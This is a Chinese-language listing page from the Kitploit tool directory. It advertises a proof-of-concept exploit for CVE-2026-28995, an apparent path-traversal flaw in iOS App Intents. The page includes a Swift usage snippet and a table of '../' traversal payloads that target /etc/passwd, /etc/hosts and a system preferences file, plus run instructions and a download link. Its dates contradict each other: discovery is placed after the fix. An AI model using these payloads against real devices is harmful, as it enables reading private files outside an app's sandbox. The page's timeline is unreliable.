Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-28995 — # CVE-2026-28995 CVE-2026-28995 的概念验证 — iOS 26.4.2 及以下版本中 App Intents 的路径遍历漏洞。 | Kitploit
工具/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
iOS安全漏洞分析漏洞利用渗透测试移动安全
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 CVE-2026-28995 的概念验证 — iOS 26.4.2 及以下版本中 App Intents 的路径遍历漏洞。

查看仓库
4242个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-28995

CVE-2026-28995 的概念验证 — iOS 26.4.2 及以下版本中 App Intents 的路径遍历漏洞。

描述

该漏洞允许恶意应用通过 App Intents 读取其沙盒外的任何文件。根本原因是 Apple 的 App Intents 框架中的路径验证不足。

受影响版本: iOS 26.4.2 及以下
修复版本: iOS 26.5(2026年5月11日)

用法

1. 函数 readCve(path: String) -> String

root@kitploit:~
let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
  1. 路径示例
路径读取内容
../../../../../../../../../../../../../etc/passwd用户密码
../../../../../../../../../../../../../etc/hosts主机文件
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist系统偏好设置
  1. 目录处理

如果路径指向目录,函数返回:

root@kitploit:~
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

如何运行

  • 在 Xcode 中创建一个 iOS 项目。
  • 将 CVE-2026-28995.swift 添加到项目中。
  • 使用目标路径调用 readCve(path:)。
  • 在 iOS 26.4.2 或更早版本上运行。

负责披露

发现时间: 2026年7月1日
修复版本: iOS 26.5(2026年5月11日)

下载工具